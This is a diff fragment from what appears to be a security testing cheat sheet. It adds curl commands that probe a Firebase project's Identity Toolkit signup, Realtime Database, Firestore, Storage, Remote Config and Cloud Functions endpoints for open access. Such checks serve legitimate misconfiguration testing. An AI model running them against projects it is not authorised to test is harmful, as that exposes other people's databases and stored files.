-d '{"returnSecureToken":true}' \
|
|
785
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=API_KEY"
|
|
786
|
+
|
|
787
|
+
# Realtime Database
|
|
788
|
+
curl "https://PROJECT.firebaseio.com/.json"
|
|
789
|
+
curl "https://PROJECT.firebaseio.com/.json?shallow=true"
|
|
790
|
+
|
|
791
|
+
# Firestore
|
|
792
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT/databases/(default)/documents"
|
|
793
|
+
|
|
794
|
+
# Storage
|
|
795
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT.appspot.com/o"
|
|
796
|
+
|
|
797
|
+
# Remote Config
|
|
798
|
+
curl -H "x-goog-api-key: API_KEY" \
|
|
799
|
+
"https://firebaseremoteconfig.googleapis.com/v1/projects/PROJECT/remoteConfig"
|
|
800
|
+
|
|
801
|
+
# Cloud Functions
|
|
802
|
+
curl "https://us-central1-PROJECT.cloudfunctions.net/functionName"
|
|
803
|
+
```
|